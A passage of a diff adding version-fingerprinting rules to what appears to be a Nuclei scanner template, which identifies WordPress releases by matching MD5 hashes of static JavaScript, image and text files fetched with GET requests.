- 4.0.32 + dsl: + - "(\"a00c2e9159048b13c3a5dd4e831099ae\" == md5(body))" + - type: dsl + name: 3.8 - 3.9.33 + dsl: + - "(\"085caa20dbc9e9f7343bc0349227bedb\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"585ead88e437e19591a6d8c43de2df50\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"39fa620599ed3bcfcd86d0f08fb3e498\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"adfc5e0653304dd92664a01ce7083649\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"5a2d6a68911f4a366f4ea3ec0a04667e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"9a87c880d0052fb9b2460d9036174588\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"5d18de7914a3e4c671455d63060dd2a5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/comment.js" + matchers: + - type: dsl + name: 4.3 - 4.8.15 + dsl: + - "(\"d9e3db00dcc6ef4d4c03ff455dcb9c55\" == md5(body))" + - type: dsl + name: 3.8 - 4.2.29 + dsl: + - "(\"a3fefb4998b3f534e144db4f235d0f03\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"5a208e90699083d393803d2d3ae55d4c\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"63b766663c76cec017bedd0bfbb726d0\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"7184dc411501524ca065630a3181c342\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"f58da1479570a8daae958114afe35ed9\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"9bfe7b668bcea89db5923f364be7d2d5\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"5695c2e76f3252ade7318e8fce327e6c\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"48e97502ef33e12eb022ad86d6d0bbb8\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"9d5033c1b96c8f3af0c09f42da8605c3\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"863d5773503d6d3b90e42f86f699802d\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"8d71ea9a92c5a75bf54c3826e9c070a9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/heartbeat.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"4714400d54b96a2c380b245300a5be5a\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"767daa50e889132aca060b188f0c4276\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"25e9e78d00555f2e724456104eff7af0\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"cc2012e2099931cd5db064122a44cb47\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"bdb3765e64c25f8ecae4774edc6768ed\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"4215343e6fb0baeb56e1670c323a2579\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"1fe14510fc9d98052c08bb3e3e7bdd8e\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"8548d05cee37b20058732f38c6613fe0\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"47c31105470a92578457104c096c0f91\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"38b33c94f0739e506b38ecbb9c62beb7\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"4b47f8e4c39036d98dc243d9a29946e2\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"396bf1e95fa7f2b2162b2c2b46b7a15a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"db78872d0b60762436b3c1869bd76f68\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"0dffa5c13ef8fbc9dbf1cd71a1bc83f5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/tags-box.js" + matchers: + - type: dsl + name: 4.7.3 - 4.8.15 + dsl: + - "(\"caadae9faa6e901537e10b4292184771\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.2 + dsl: + - "(\"22409605b64b334cb93f77e246e35ff5\" == md5(body))" + - type: dsl + name: 4.4 - 4.6.20 + dsl: + - "(\"98130de261db524ce177b6de91aca164\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"74a49b1066cf04c0e5c92020e0ff23af\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"63756530c3d8b22327dcc0f15e71b8f9\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"1c5bb376ced2c7582e77eb388164871b\" == md5(body))" + - type: dsl + name: 5.2 - 5.3.6 + dsl: + - "(\"027bb2cd44a823dbd923b98a4f76a9c0\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"9444ec2274549c1f25b54059720b63af\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"d69960fa00e063d0d05e4779828ec42b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/image/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"fcd22e18e8ee0fcf99a822f19dac98d7\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"70e32e47fc0e319bf3558d21c537e983\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"55065b4d900692d4308d97e79a0fa023\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"e8631e277ba2b821eb499489ffffd171\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"e0503423284ee602ddafaeb8dd074147\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"4ece365f92b620c8d64ef003230fd75c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"4c4b675114bc33b728f43f7c6d642f6b\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"3a809b03fac37dfc31efdbe4899a90f4\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"f251faab04cf886a0c6633d8ee73b420\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"603056d1cc5154bb806457d0b4f5d4d3\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"251c380c1f052e4653a01b7888237d7d\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"92889d5f994a6864a8235e5d426c1e73\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"d48ef21012579e885df3ebd794e9499e\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"50bb8db93582d62b01ecb32d3f0f819e\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"2d94fa5a43e96cc2ad7dc4e88e900fea\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/image/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"a6e233c2e8e3903a0b08a9e6ae358d4f\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"7f7e4215ef62b1621a3479411d621a9b\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"4584af9ba8c439604e4199168176a7b7\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"4a3db8fe2340caae4a61f43104257990\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"e60f8eb665759cface17e2662e085ecd\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"3fdb72c74a1d00f833cd12985c8964a7\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"d309316c1767ca923c2216d7348c2194\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"d8da74879ff4f0943f245f5dac52f10b\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"e808a23a61e91125d5e91a4403739692\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"1344c48d9051035a7b44e80213dfafa0\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"9ce288b4d2a341ae1eb77b53360e3c89\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"5756a9cf36da2f719f90edaeb64f73f7\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"594d170a70097bea65fca5776e691d0b\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"c2322e331f19d4449396c292b5d40343\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"8a42170c8d0a801b34d85caab530f03d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/xit-2x.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"8fb0729c541cbdc4609faf3f4ad02fc7\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"c5f831da18e837b9caf290a7866ddca6\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"d9a81fb5a5e21e6d74a5e81ce37b421e\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"9cd381c6753a40340d85e2c57a3c35c8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/xit.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"e5012902a358fbb96031acdcf048d7ca\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"c313ffcd0a1fe87b0a65dc2553e0ffdb\" == md5(body))" + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"a815dc7ad6c4175e95bc48f3ab6832e9\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"94ecab09335897c4ab392bef96366e7e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/down_arrow.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"65dcc85d3a75ff5776fbe3df0122b7e2\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"21ed67741d76d61ac1190caab379ada8\" == md5(body))" + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"7bbbc00f708a791dc4e674f9e21aa2ca\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"fcf88456be7e16c66ff6596e477e5f75\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/down_arrow-2x.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"a073b8a1ee9b2482017f3628da40a861\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"784a750a8b89c341821b90e0fcaba810\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"e52496d9eecd561f7c6d964acb0a5a73\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"f75deb11e71999ea4d859ec1fb8766dc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_question.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"d22775b2e32645907141f788c36d4e9d\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"d9c5f831b1159fb32757ec8735d67fe1\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"0518596a4eb94c32a2b2ed898bdc3549\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"b3df5b2d00d22715be1c1d9157b3a246\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_neutral.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"8a95dbfaa99809b0150687ae0cb45aed\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"7445588270b83d0154018a0f6158d779\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"4e8b7a51c7f60a2362a4f67fbbc937e7\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"1816d8e65601024d3348553121e19876\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_sad.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"1a273db3c34f6afb3fed75417ca5e7b6\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"793fa2ae7c21bd7db0803c27cc1c07a3\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"5a50535a06def9d01076772e5e9d235b\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"de4906780fe16fd4d3544d7ae6ed442d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_biggrin.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"c7597052fe2b16db307d6bd14e7b8c6b\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"0f9eafc5f35050bf3d79f38d88bf9d86\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"f970a6591668c625e4b9dbd3b7a450d7\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"fc4bb2f14a72a7bd3abf5d0e6b49d87c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_surprised.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"299972b5cdd1f1e0690dd95e4038bd87\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"db0d028bc820c41fff8fadcaee90d43d\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"ae735b5dd659dc4b3b0f249ce59bef79\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"55ec8bde2deeeb232bfef6b6b530e73f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_wink.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"d01a4f87055ac0fce8a66739d80434ba\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"6b687a134711bb0c7dd9b4ba5223d5ca\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"f058206bb8ff732dbe8e7aa10d74c9cd\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"653f1432aee113890f69a1179de0e3a5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_cool.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"96467eb5ae18dfa22ea1c0fa3e74380e\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"5841374462868c9a766738b5d5bce9fd\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"25c83ea511f206e88f214719dad9c88c\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"0a901c7fa06097ecf7e0cd69766a2edf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_confused.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"7fefa473594650055a36b9e3062c9a91\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"f4e73191a55161c8654310799bdc09bd\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"4affed1b55e5f73c9f0675ae7d0ad823\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"2f2309c617d3a27701772478eabe9359\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_smile.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"b2984729c3b6cdc07508b88b5c0a4d1e\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"bffd535b79d68b9a2fa2ba56dbd2ea56\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"9ee646ffab71107d1a11407be52f33a5\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"e3e033f32e291fc0328deadd70ebcef0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_mrgreen.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"fde9e44a8aae0e89bd527792b4779aca\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"a0c07b1e446da29dcb0ad9e19ff0bda4\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"54e8505227edae1e583cf2f9554abc3a\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"8d07245fc613bd75b2587c49251d7e24\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_idea.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"bdb3226d2568b8c1edf8f453b1e872e6\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"16c8ed37a3f6d76fdd9c080fe462f6a4\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"aaebc9c048367118ba65e1da46bc3e08\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"e5ecd43c5dd7ff5718330e1974de81e5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_razz.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"17cbe5cbade2b4ec3d85be4ac9409add\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"8ae3a1eb1b636b65585da3e12b225008\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"7aec68426aa06f01e2b1ac250e5aee62\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"395bde77b310909a44b341044dad41da\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_exclaim.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"5ce371458c1a2148595f5f3daf7b5fc8\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"3d11adad32e7bbc4d721156e3b003bd5\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"da86bbf377f97d06047aa781a582c52f\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"3a5cadb33e358d00720fc6cef47367d8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_mad.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"d7be08b669651a63080cfe7b9004d330\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"2ad92f9ec41ddc8ee253c2409a027404\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"e4355c00894da1bd78341a6b54d20b56\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"561e9e210ecb0c400ffd63fb30e253b8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_twisted.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"62abd50ca92eb2381a7c60e351f64c46\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"56d63d335faf2b9b705216f77fc84084\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"c9c3d12da1e9da699e490b86d24eee85\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"4cbed7765b3fe5e92b2a389ed73bc9f7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_arrow.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"bfcab5090b1280bbe495dbead4d2281f\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"d9078df58bf1de76746241bd92ac2444\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"394bffa679f650b7d2f22aa263cc06ba\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"2009c9ff4a3cd667fecc6f9d08393a78\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_eek.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"a6c65fa6ff738ef6c46a4e80a65f7aa0\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"60666400eabb78b17a76039bdcd4dab0\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"52e43743e38a67d5d28845a104ca8c7d\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"9c2f4920bfb18a78f129f12822f495e1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/blank.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"48bb2baaf4353109f7c2665d96aa390b\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"f11f0a834146497c0b9b12fb1027fec7\" == md5(body))" + - type: dsl + name: 2.6 - 3.8.35 + dsl: + - "(\"6d22e4f2d2057c6e8d6fab098e76e80f\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"c9fd1cfbca9f678ed068ed6b4bbeb666\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/ID3/readme.txt" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"9396dfe1c69c938eb17f564c4e5bab18\" == md5(body))" + - type: dsl + name: 3.6 - 4.0.32 + dsl: + - "(\"fc517870758d5fb84026d45e9aadbd2d\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"dda3f6ff7ad91e65d1a7d1a56b3538e3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/ID3/license.txt" + matchers: + - type: dsl + name: 4.3 - 5.2.9 + dsl: + - "(\"35d98aadf8f7cc6851336651f7a66b98\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"361298a1f00ff6d56a51e0c3d2233194\" == md5(body))" + - type: dsl + name: 3.6 - 4.0.32 + dsl: + - "(\"9fccf5d6799a9d78e7f6a742b79587e3\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"47d8905625e6505f1117fa0ba8d5b7af\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.color.min.js" + matchers: + - type: dsl + name: 3.6 - 5.2.9 + dsl: + - "(\"ff2db8dbf145ce47f31781eef33e764a\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"dc7e27d84eafb6b436f9f224e8ce8153\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"7271d32a58986771019f4fa31328cd88\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/position.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"1c4a13edec1958817e83433aeaa42f62\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"9396d719a4eadde27896ce30327a3a89\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"7d94d07b3a1c9f704b76120cc16874fb\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"586bc1619fe2aa146bef070f140fd386\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"e7346f4d2945cebe75bd53cf232f927e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/widget.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"8cf7f36bbd79bc0664b6113f7a7837fe\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"0bb0af0869341cca0236ba99d4ea092f\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"02e635faa37ecc25ee5d630d888cf53c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"b369c6d4df45a622294874f96a746fb5\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"00dedd56324da186973a3b2cc5e8023c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/wp-playlist.min.js" + matchers: + - type: dsl + name: 4.6 - 4.9.2 + dsl: + - "(\"264563e94e2d16b1066bd413ebc592de\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"f7f63370324b974e93d8ff15c6d35765\" == md5(body))" + - type: dsl + name: 4.9.3 - 5.2.9 + dsl: + - "(\"5fb749f8adce337f9f303136821bdf5f\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"ace20386f3337c475ee213634b5422db\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"8607e87dcbb351d067d1a54485e8a357\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"564cd5d11909d4675327b6f71fa09269\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"011e67d9a7ce51e04da304564eab4eee\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"273bde000e25c739c22659cba8293fcc\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"b88b9554a163ab6eabae776b24d0d2b9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js" + matchers: + - type: dsl + name: 3.9 - 5.2.9 + dsl: + - "(\"eafbb1478981e337981d287474e240b8\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"514f31ff2f073c993e252206da58dce0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js" + matchers: + - type: dsl + name: 4.4 - 5.2.9 + dsl: + - "(\"04fb37608ef94f9a747901b2f98b4fce\" == md5(body))" + - type: dsl + name: 4.1 - 4.3.25 + dsl: + - "(\"b229462e6a542696fbf6bd4917c9074f\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"86dbf10dbce4709d79872dd5ce2219e6\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"e692a8504899e953b1e96c8daaecb310\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js" + matchers: + - type: dsl + name: 4.7 - 5.2.9 + dsl: + - "(\"a92e4569e92450776f18e0bb6ddae1b1\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"91368350377a702b925dbcf6fa80cc8d\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"1842882ca7cdf96e7a1bf3e1d55691d2\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"8291a8caa3672971dc61b332ecc437c3\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"091dd1893b9d7916fd4111200ac21e3c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/xit-2x.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"8fb0729c541cbdc4609faf3f4ad02fc7\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"c5f831da18e837b9caf290a7866ddca6\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"d9a81fb5a5e21e6d74a5e81ce37b421e\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"9cd381c6753a40340d85e2c57a3c35c8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/xit.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - 